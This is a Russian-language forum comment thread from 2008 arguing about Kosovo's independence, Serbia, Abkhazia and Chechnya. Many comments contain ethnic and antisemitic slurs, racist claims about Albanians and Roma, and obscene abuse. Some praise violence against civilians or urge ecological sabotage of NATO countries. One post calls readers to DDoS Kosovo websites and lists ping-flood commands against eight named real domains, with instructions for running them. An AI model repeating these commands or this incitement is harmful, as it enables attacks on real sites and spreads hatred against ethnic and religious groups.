У Мильштейна,конечно,голова слабая,поэтому обращаюсь не к автору,а к форуму...Объясните,пожалуйста,что теперь в мире ДВЕ Албании? А такое возможно?А вдруг,смотришь,возникнут две Украины? Нет Украйн может стать и три...А вот Эстонь только две,нет-нет,только две...Все будет хорошо,обе остануться в Европе! Кавказ в Европу? Не пойдет!Ассистентом асинизатора в Европе? Гордость не поволит! Нет Кавказ не отделится...Он своих женщин на базар не повезет,нет,нет не повезет - бизнес дело мужчин!Европа заигрывает,задаривает-это хорошо.Деньги - это очень хорошо!Туалеты не чистим,жены дома,а не на панелях, а деньги плывут и плывут... Потому,что мы не бараны...Кое-как отрабатываем -приходиться пошуметь,покуражиться...все хорошо!

очевидец вашего подения в дерьмо! 18.02.2008 22:10 (#)

Американцы оканчательно сунули вас лицом в дерьмо и вы это съели:))) Угрожали миру признанием в ответ на Косово Абхазии и Осетии..Ну что признали? Да весь мир прекрасно знает что именно Россия и есть самый большой противник признания Абхазии и Осетии... Вы добились того что вас никто в мире признавать за серьёзное государство не будет и не надо угражать миру ядерным орущием..Они у вас давно сгнили и вы сами незнаете как от них избавится да и никто из Российских правителей не будет рисковать жизнью своих детей и нажитым то есть награбленным капеталом Но вот доверять и связыватся с вами уже никто не будет... В самый ответственный момент вы не смогли определится теперь никто никогда не будет надеятся и связыватся с вашей банановой республикой. Думаете обойдётся? Нет не обойдётся и вы русские в полном дерьме! Да здравствует Америка!

(написано анонимно) 18.02.2008 22:23 (#)

Мзй,гражданин,не шуми.Расставь буковки правильно,а то создается впечатление,что в школе плохо учился.

(написано анонимно) 18.02.2008 22:32 (#)

Да, судя по орфографии, вы явно не русский!

(написано анонимно) 19.02.2008 03:37 (#)

Жид брайтонский.

Мирослав 18.02.2008 22:31 (#)

Забытый геноцид

Число убитых мирнах сербов составило более 15000 человек. Сербы оставили 120 тыс. домов и квартир. На территории, занятой хорватами, осталось 950 памятников сербской культуры, 80 народных библиотек, 122 школы, 85 детских садов, 67 кинотеатров. Оставлены были плодороднейшие нивы и луга. Югославия приняла беженцев на свою территорию. 12 тыс. человек были отправлены в Косово, 60 тыс. в Воеводину. Остальные 180 тыс. осели в собственно Сербии. В итоге хорватского наступления количество сербов в Хорватии сократилось на 90,7%. Действия Хорватии осудили лишь Москва и Белград. Ведущие же державы отнеслись к трагедии сербов с полным равнодушием. Англия и Франция выразили «озабоченность» событиями августа 1995 года, что походило на молчаливое одобрение действий Загреба. США и Германия увидели в хорватском блицкриге перспективы увеличения своего дальнейшего влияния на обстановку на Балканах. По некоторым сведениям, Вашингтон принимал определённое участие в подготовке хорватской агрессии. Американский госсекретарь У. Кристофер возложил вину за хорватское вторжение на сербов, якобы спровоцировавших их на ответные действия после сербского наступления на Бихач. Германия также не осудила действия ВС Хорватии, лишь выразив пожелание, чтобы военные действия не переросли в общебалканскую войну. Некоторые германские политические деятели в своих выступлениях открыто поздравляли хорватов с удачными действиями.

Мирослав 18.02.2008 22:36 (#)

А спустя 4 года Сербия за гораздо менее масштабные действия а Косово подверглась свирепой атаке так называемого "мирного" блока НАТО. Если здесь есть какая-то логика, кроме логики лома, против которого нет приема, и больших батальонов, которые всегда правы, то кто объяснит эту логику, не впадая при этом в аморализм и лицемерие? Заранее благодарен, Мирослав.

(написано анонимно) 18.02.2008 23:20 (#)

Попробую объянить, Мирослав. Хотя уверен, ты и без меня знаешь ответ. Германия боролась за голоса хорватов проживающих там. Колю позарес были нужны эти голоса! Плюс религиозная близость. Сербские лидеры, хорошие они или плохие, другой вопрос, были настроены антиамерикански. Поэтому Америка поддержала хорватов. Однако, поддержав хорватов лишь косвенно, справедливости ради необходимо отметить, что без этой поддержки у хорватов мало что получилось бы, США не получила того, чего хотела - безконтрольное размещение военных баз на Балканах. И тут такой подарок! Албанцы и без боевых действий мечтающие сбежать в европу, побежали семьями! Это тебе не польский сантехник! Это, как правило неграмотные женщины, 8-10 рябятишек, пару - тройку младших дедек, не имеющих ни какай специальности, умеющих только торговать( хорошо если не накротиками). Культура и образ жизни "беженцев" непривычен и неприемлем для Европы. Их всех надо одеть, обуть, накормить! Поневоле испугаешься. Плюс Милошевич бочку катит. А так, отбомбился, ввел войска, запихнул обратно "беженцев", привел к власти марионеточное правительство, оттяпал хороший кусок земли, под военные базы( прошу заметить, тогда еще официально сербской земли) и все проблемы решены! Ты еще и герой! А земли не жалко, все равно сербская. Часть одним, часть другим, пока всем хватит. Да и хороший урок другим народам и странам. Не хочешь проблем, не выступай против Америки. А старушке Европе разве проблемы нужны? Да и "новой" не нужны, тем более болезнь у нее сейчас такая, если Россия сказала нет, мы обязаны сказать да. Вот и весь сказ.

Мирослав 18.02.2008 23:34 (#)

Ну конечно же ты кругом прав. То есть всегда и всюду решаются сугубо утилитарные задачи, а все разговоры про какое-международное право, защиту угнетаемых и т.п. есть просто дешевое идеологическое прикрытие. Это касается абсолютно всех, и кстати говоря нас в том числе. Это банально, но это факт. Так всегда было и всегда будет.

(написано анонимно) 18.02.2008 23:49 (#)

" Кстати говоря нас в том числе" согласен полностью. Но если это делается в интересах Росси могу это понять (хотя не всегда оправдать). Но кто объяснит мне, почему очень часто (практически всегда) "демократы" воспринимают "на ура" все действия Америки, даже если они, явно направлены против интересов России. Ведь кто бы не находился у власти в России, интересы США и РФ часто не совпадают, по объективным причинам.

DROMOS MUSAGET 19.02.2008 00:00 (#)

Американцы вызывают демонов раздора, которые помогут им ещё немножко порулить миром. Как показывает опыт 11 сентября, демонам быстро надоедает слушаться недоучек-чернокнижников. История не заканчивается завтрашним днём, Зло успеет вернуться к тому, кто его призвал в этот мир.

(написано анонимно) 18.02.2008 22:50 (#)

Мирославу.

Россия прокрутила такой же фортель с грузинами в Абхазии и ЮО ТРЕМЯ ГОДАМИ РАНЕЕ! Так что обвинять НАТО в пособничестве во в зверствах против сербов России по крайней мере лицемерно.

Мирослав 18.02.2008 23:07 (#)

Ну что можно требовать от варварской Московии? С ней вообще все ясно. Речь-то идет о гуманных, правовых и цивилизованных государствах.

(написано анонимно) 18.02.2008 23:36 (#)

Вот только варварская Московия не бомбила мирные грузинские города, в отличии от гуманных, правовых и цивилизованных. Правда спасла президента Грузии от пленения, но это другой вопрос.

Мирослав 18.02.2008 23:59 (#)

Приношу извинения. Нужно было брать все словосочетания "варварская Московия", "цивилизованные страны" и т.п. в кавычки. Я только хотел сказать, что буквально все одним миром мазаны и одним лыком шиты. И побеждает сильнейший.

(написано анонимно) 19.02.2008 00:06 (#)

Да и так это все знают и понимают, уважаемый... Разговор ни о чем, бисер не мечите.

Мирослав 19.02.2008 00:24 (#)

Увы, судя по всему, не все. Иначе бы не было бесконечных обвинений злой Пиндосии с одной стороны и злой Рашки с другой. А в разговоре ни о чем каждый имеет право не участвовать. С уважением, Мирослав.

karelija 19.02.2008 00:12 (#)

anonim 20:36:15...Ne Moskowija bombila w 1994-1999 g.Grosni.I chto wi dumaete, Moskwa ne mogla pridumat drugowo wihoda ubrat Dudaewa.

(написано анонимно) 19.02.2008 00:26 (#)

Что делать, ЕБН у власти был!

(написано анонимно) 19.02.2008 08:17 (#)

вот этих гандонаф ебашить надо...

Sandro 23.02.2008 07:46 (#)

Бомбила, бомбила!

А Сухуми, по-Вашему, какой город? Корякский?

старикан 18.02.2008 23:39 (#)

Работал я с сербами в середине 70 на строительстве гостиницы "Ялта".Более мерзких людей,ненавидящих русских, не встречал.Получали они суточные 25руб,а наши 2,60.Смотрели на нас как на быдло. А когда напивались-просто мрази.Бедным девчонкам досталось от них.Ну,чего Вы хотите,ведь более сорока лет хорват Тито только мог их удержать.

(написано анонимно) 18.02.2008 23:55 (#)

Правильно, и теперь у них за это надо землю отрезать, так?

В этом заключалась ваша мысль?

старикан 19.02.2008 00:48 (#)

летали когда-нибудь из Москвы до Южно-Сахалинска,ездили ли поездом №1 из Москвы до Владивостока?А?Так вот земли у России и при том не возделанной -МОРЕ.Запущенной,загубленной.Вот и зовите дорогих Вашему сердцу трудолюбивых сербов к себе.

(написано анонимно) 19.02.2008 01:06 (#)

Старикан, у тебя начались уже старческие маразмы! Речь не идет о том хороши или плохи сербы, речь идет о том, что у государства путем не законных, насильственных действий отобрали часть терретории. И это может крайне плохо отразиться на всем мире! Слишком много, в силу исторических причин, этнических конфликтов на земле! Дошло!!!

fog 19.02.2008 01:23 (#)

Провозглашением независимости Косово , фактически заехали в морду сапогом великой Российской империи или плюнули , как кому нравиться.

Хороший урок всем, что НЕ ХРЕН со слабаками и засранцами, вроде великой империи Россия иметь дело. Великая Расея че тока может о большой любви 3,14здеть, ко всем, если только врагов нету, если враги есть , Россия жопу в руки и в кусты. И не хрен говорить про вторую мировою, во вторую мировую воевали кавказцы, украинцы , белорусы ,татары , а вот те кто больше всех вопит про свое участие в войне , ковали победу в тылу, а не на фронте. Имперская Россия задавила Чечню,закинув на территорию 100 на 100 км 200-300 тысячную армию стянутую со всей Российской империя танки, самолеты, морпехи, десантники и прочие вонючки -каратели. И патритоы или как точнее их называют пЕдриоты Расеи вопят "ну что кто хочет испытать силу русского оружия", вот сербы испытали, проверили на своей шкуре каково быть друзьями России. ......... , а то ведь Абхазы и Осетины,и приднестровцы тоже туда свое рыло суют,в друзья России набиваются, а ведь сербы еще лекго отделались , на Кавказе и в Приднестровье так легко могут не отделаться, в лучшем случае Россия, в случае конфликта , пришлет свои худ. фильмы , где очередной "Алеша" убивает всех врагов России, спасает "Блестящую" телку с большими титьками, и они во славу России занимаются сексом ,для поднятия боевого духа.В худшем случае Путя с Лавровым споют дуэтом песенку Дуремара , как во время шутовского похода на Приштитину клоунов -танкистов , "А я тут не причем, а я тут не причем"...........вообщем каждый сам выбирает свою дорогу и на ней друзей и врагов

(написано анонимно) 19.02.2008 01:57 (#)

Вот господа демократы перед вами прекрастный образец "демократического", "либерального" мышления! Ярко и полно автор показал глубину и широчайший кругозор радетелей прав человека! Какая прекрасная правовая культура, какой богатый лексикон! В общем типичный представитель право- либеральной политики! Лучшей пропаганды демократических взглядов придумать невозможно! Чем больше таких постов, тем ниже ниже планка популярности правых.

Pox 19.02.2008 05:57 (#)

Какол ето, не человек, представител древнего племени Украдов

Какол ето, не человек, представител древнего племени Украдов

fog 19.02.2008 12:59 (#)

а когда я писал что демократ и либерал

я Бандеровец и твердо всегда убежден что воры, убийцы и насильники т.е. Абрамовичи, Лужковы и Пути должны быть в тюрьме, а вот либералы и демократы Буш, Саркози , Меркель это их первые друзья , так что не хочу я быть другом , бандитов и насильников т.е. нынешнего кремлевского режима

User qwertsapiens2007, 21.02.2008 01:20 (#)

Эта планка уже под подошвами сапог!!!!

Эта планка уже под подошвами сапог!!!

Алексей 19.02.2008 02:03 (#)

Очень показательно, что даже такие наперсточники, как Мильштейн и Портников вынуждены признать, что

"..и с сербами не очень хорошо получилось..".Конечно, они и не знали что из Косово изгнано более 200 000 сербов, и под рук-вом KFOR за годы оккупации продолжалось изгнание сербов и уничтожение памятников культуры и религии. Отнесем это на их неосведомленность. Более интересно совсем другое. Еще один экземпляр с нордическим блеском в глазах объявил целый народ "плохим", заслужившим уничтожения, и все "цивилизованное мировое сообщество" схавало это заявление, как вульгарный пипл. И если так, то возникает вопрос: в чем проблема, если несколькими десятилетиями раньше другой нордический товарищ объявил другой народ плохим, достойным уничтожения? Не заслужил ли тот народ своей трагедии, причем неоднократно заслужил?

Русский из СНГ 19.02.2008 02:12 (#)

Запоздалая расплата

В свое время - в конце 1940-ых годов - когда Сталин пытался убрать хорвата Тито от руководства Югославией, сербы во главе с Ранковичем поддержали Тито. СССР лишился шанса получить выход к Средиземному морю через югославские порты. Тогда сербы выбрали Запад. Если бы сербы выступили, как надеялся, видимо, Сталин против хорвата Тито, то вся послевоенная история пошла бы в другом направлении. В Греции в гражданской войне тогда победили бы коммунисты. Сербы тогда спасли Европу. Вместо благодарности Европа повернулась к ним спиной.

Георгий 19.02.2008 02:18 (#)

Огнеопасный фейерверк

Илюша, ты прав и не прав, ты сравниваешь роль России на Кавказе с ролью Америки в Косово - то есть потенциал России и Америки - а это смешно. В Косово славяне уничтожали косоваров с помощю России, а в Абхазии абхазы уничтожали грузин опять же с помощью России. Так что хрен с палььцем сравнивать не надо - это не одно и то же: в первом случае дети рождаются, во втором - палец откусывают....

(написано анонимно) 19.02.2008 02:58 (#)

Ну, конечно во всем виновата Россия. И в Косове, и в Грузии,и в Ливане, и в Судане, и в Кении, И в Паржских беспорядках тоже. Если, в мире какой-нибудь конфликт, знайте виновата Россия! Поистине великая страна! А может быть глупый Георгий?

(написано анонимно) 19.02.2008 03:44 (#)

А палестинцев жиды тоже с помощью России убивают?

Eesti 19.02.2008 06:14 (#)

палестинцы евреев с помощью России убивают.

***

Алекс... 19.02.2008 14:06 (#)

А я то думал...

что это террористическое государство Израиль убивает палестинцев на их териитории. Жалко, что ракеты палестинцев не оснащены системой наведения "терком", тогда эффективность их применения повысилась.

nekto 19.02.2008 02:59 (#)

ne ojidal etogo ni ot granei ni ot milshteina

G-n Milshtejn, komu delali v Abxazij etnicheskuju chistku? Abxazam ili Gruzinam? u vas sovest' est'? ili ona lishnjaja? da... razocharovalsja. xotja vam eto vse ravno.

Тсарь пучин 19.02.2008 04:49 (#)

Меня это тоже удивило. Оказывается, это не грузин согнали, а наоборот. Там, где жили грузины веками, теперь живут абхазы - граждане великой России - миротворца.

имя 19.02.2008 05:12 (#)

заголовок

Пацаны.Явас всех выебу одной левой.сраные философы.че вы рассуждаете о косово,когда сами ссыти криво.неприятно.Вот сейчас я выпил фостерса не знаю сколько поскольку сам торгую,сам пью.8 литров.косово=прусть косово а фостер- это хроорошее пиво.Ура Балтике.Кстати.Заебала пунктуация. В школе учил писать правильно,стараюсь.е поверети,искал 10 мирут на клавиатуре букву блядь. опять ищу букву забыл какую букву я ищую

(написано анонимно) 19.02.2008 05:00 (#)

Президент Литовской Республики Валдас Адамкус приветствует решение Косово провозгласить независимость и считает, что такое решение является единственным способом обеспечить долговременную стабильность в этом крае."Прошу Министра иностранных дел Пятраса Вайтекунаса в ближайшее время обратиться к Сейму с просьбой начать процедуру признания Косово", - заявил президент.***** "Будучи членом Европейского Союза и НАТО Литва всегда подчеркивала значимость безопасности и стабильности, - говорил глава страны. – Я убежден, что безопасность в Европе невозможна без стабильной ситуации в Косове". ******* Глава страны напомнил, что государства ЕС провозгласили единую декларацию о признании независимости Косова. В ней утверждается, что государства ЕС, основывающие свою позицию на национальной практике и международном праве, могут свободно определиться в вопросе развития отношений с Косово как независимым государством.******* По мнению главы Литвы, случай с Косово уникален и не может расцениваться в качестве прецедента в других краях, существенно отличающихся от упомянутого государства.******** Мировое сообщество НИКОГДА не признает независимость Абхазии и Южной Осетии. Параллели проводить абсурдно.

Sandra 19.02.2008 05:03 (#)

Предыдущий пост мой. Извините, забыла подписаться..

я 19.02.2008 05:25 (#)

Сандра,спасибо что откликнулись. еперь я понял,что не бьет буква и буква .о.если ты женщина хоть на сан знаяъй, что ты лучше всех,но если это подкол- найду и накажу.

Sandro 23.02.2008 07:50 (#)

А тут ещё, оказывается, моя тёзка есть?

Привет, Сандра!

Eesti 19.02.2008 06:12 (#)

Мильштейн заблуждается поддается навязанным Кремлем клише. Сходство Косово с Абхазией и ЮО повехностное. Принципиал

Мильштейн заблуждается поддается навязанным Кремлем клише. Сходство Косово с Абхазией и ЮО повехностное. Принципиальное отличие - Сербия потеряла суверенитет над Косово вследствие воееных преступлениой и попытки геноцида. ЮО и Абхазия - не сепаратисткие регионы, а марионеточные, которые подвергаются ползучей аннексии России (денежные знаки - рубли, паспорта - русские, чиновники - русские и/или агенты спецслужб России, назначаются Россией), которая злоупотребляет доставшиомся ей по глупости Запада мандатом ООН.

User evgeny38, 19.02.2008 10:08 (#)

Commentary.

Да Здравствует Великая Албания!

User evgeny38, 19.02.2008 10:25 (#)

Commentary.

Интересно будет выглядеть независимя мусульменская республика со столицей в Лондоне(лет через 30).

(написано анонимно) 19.02.2008 10:57 (#)

А дальше?

Я думаю, что НАТО теперь активно займется контрпрецидентом - воссоединением какой-либо страны при помощи вооруженных сил. Какой страны - кандидатов много. Когда это произойдет они, разумеется, будут в полном шоколаде, а все кто не НАТО - в полном дерьме. Включая ООН.

Цукерман Лейба Мовшевич,вольный каменщик 19.02.2008 12:27 (#)

Багапшу задали вопрос:

" Признает ли Апсны независимость Косова?" . Багапш не ответил. И это понятно, с одной стороны он не может пойти против Расеи, которая содержит его режим, а со второй стороны апснюкам нужно признавать Косово, иначе не на что будет ссылаться для требования независимости. В говнистом положении апснюки, ох в говнистом.

User lev, 19.02.2008 12:31 (#)

"Обустраивать территорию по примеру других европейских стран" - с каких это пор Албания стала европейской страной?

Если страна расположена в Европе, это еще не значит, что она "европейская" (пример - Россия). Я ничего не слышал об успехах приватизации в Молдавии. С чего автор решил, что отделившись, Косово проведет какие-либо реформы? Что-то мусульманские страны в реформах не замечены... А албанцы ведь мусульмане! А потому и будут продолжать просить (требовать) денежную помощь у Европы и Америки. И никакое отделение им (Европе и Америке) не поможет. Скорее уж Сербия у себя реформы проведет...

fog 19.02.2008 12:51 (#)

В любом случае победа ЕС над Сербией это Пиррова победа

Еще несколько таких побед и Европейской цивилизации будет кирдык, никак не пойму зачем Европе независимость Косово. Албанцы были христианами , османы на них надавили стали мусульманами , надавят китайцы , албанцы поверят в Конфуция и Дао, если смогут выговорить конечно такие сложные слова,албанцы это цыгане, можете меня обвинять в расизме, но цыган и албанцев цивилизировать просто невозможно (может за редким исключением), с моей точки зрения с генетикой не поспоришь это наука точная.................а вот почему русская душа так любит цыган и особенно их пляски , может родство душ

Алексей 19.02.2008 13:03 (#)

Интересно, наши учителя жизни с запада будут продолжать нас учить, или заткнутся на некоторое время?

В общем-то вина сербов лишь в том, что они начали подавлять сепаратистов на своей территории. Сепаратные движения, которые инициировал, подогревал и вооружал "невинный и святой" запад. Тем он занимался и занимается(отчасти при помощи либералов разного разлива) в России. А гражданская война - это не соревнование в благородстве, там все хороши, но сербов судят в гааге, а террористу по кличке "змей" лыбятся и пожимают окровавленную руку. России удалось на своей земле немного навести порядок, подавить вооруженный мятеж, НАТО не сунулось к нам напрямую. А Югославия - сравнительно слабая страна, ядреного оружия нет, с ней не стали церемониться, как и с Ираком. В Европе окончательно выбросили всякую право-левозащитную толерастную косметику, утвердив на новом технологическом уровне право сильного.

(написано анонимно) 19.02.2008 18:07 (#)

Эх блин...

Ошибка сербов в недостаточной решительности. В наш век для нанесения странам НАТО глобального урона не нужно обладать ядерным оружием. Достаточно устроить пару экологических катастроф. И мораль сдесь не причем. Война есть война и все правила на ней придуманы сильными для того, чтобы слабый не мог сопротивляться. А теперь грустно и смешно наблюдать как правительство сербов пытается сделать видимость решительной борьбы с теми, от кого, по существу, ждет милости.

(написано анонимно) 19.02.2008 13:14 (#)

Итого:

Косовский феерверк угрожает России. Не думаю, что "обойдется". Кому-то нужна войнушка, чтобы сохранить бабло

(написано анонимно) 19.02.2008 17:07 (#)

xaker.ru

•°•°•°•°•°•°•°•°•°•°•°•°•°• ВНИМАНИЕ! ГРАЖДАНСКАЯ АКЦИЯ! °•°•°•°•°•°•°•°•°•°•°•°•°•° Просьба разослать во все форумы, все группы и отделы это сообщение Вешаем косовские сайты:1 атака:19 февраля-22:00 (По Москве) Призываю всех присутствующих здесь ИТ-специалистов, хакеров и других неравнодушных людей ОТПРАВИТЬ КОСОВСКИЕ ПРЕДСТАВИТЕЛЬСТВА В ИНТЕРНЕТЕ В ПОЖИЗНЕННЫЙ DDoS! Мы сделали это с Эстонией, мы сделаем это с албаньем! КОСОВО - СЕРБИЯ! ping -n 5000 -l 1000 www.kosova.com -t ping -n 5000 -l 1000 www.assembly-kosova.org -t ping -n 5000 -l 1000 www.kosovapress.com -t ping -n 5000 -l 1000 www.rtklive.com -t ping -n 5000 -l 1000 www.kosovalive.com -t ping -n 5000 -l 1000 www.kosovayellowpages.com -t ping -n 5000 -l 1000 www.alb-net.com -t ping -n 5000 -l 1000 www.kosova.de -t Чтобы найти еще сайты и отличить их от сербских, набирайте в гугле KOSOVA через A, так они пишут. •°•°Все очень просто, пуск-выполнить-копируете по очереди строчки, начинающиеся с ping. Хватит пустой болтовни, сметем албанцев из интернета!°•°• Я делаю это за Косово, за Сербию, за Православие, за тысячи замученных душ и десятки разрушенных храмов!

User azimoff, 19.02.2008 17:48 (#)

КАРАБАХ

не надо беспокоиться никто и никогда не признает приднестровье,абхахию,осетию и тем Более Карабах. меньше чем за сутки Косово признали 17 государств и 37 стоят на очереди. а Карабах за 17 лет не признан ни кем, и не будет признан. Карабах это неотъемлемая часть Азербайджана. так что не путайте Косово с Карабахом.+

Аме 19.02.2008 21:25 (#)

Свободу Кавказским народам, долой геноцид народов.

Все народы должны быть свободными.

(написано анонимно) 20.02.2008 04:30 (#)

prekrasnii primer togo chto familiya avtora ne prichem, vse dolzhni bit' patriotami, a to posyadut')

Слава из России 20.02.2008 11:24 (#)

Вы с ума сошли! Этнические чистки в Чечне ?!

Население Чечни после официального завершения войны - 1 миллион человек, больше, чем было до! Русских же там нет вообще, кроме военных и командированных рабочих и специалистов. Так что если чистки и были, то с точностью до наоборот!

Слава из России 20.02.2008 11:25 (#)

а вообще Мильштейн прав в том, что

беда Сербии, Абхазии, Осетии, Приднестровья -они просили защиты у России, а не у США и ЕС.

User qwertsapiens2007, 21.02.2008 01:18 (#)

Сербы,

Преступления были с обоих сторон. Нехорошно обманывать, Ильюшенька.

аслан 26.04.2008 01:22 (#)

ильюшенька не обманывает. он как тот бухгалтер: "а сколько надо?"

аслан 26.04.2008 01:16 (#)

господин И. Мильштейн. я вам предскажу, где рванёт в следующий раз. рванёт там, где россия решит. все эти карабахи, приднестровья и прочие абхазии сами никогда не смогли бы самостоятельно прожить и недели. россия их поджучивает и поставляет сепаратистам оружие, деньги и советников. мне даже неловко это вам объяснять. ведь это так очевидно...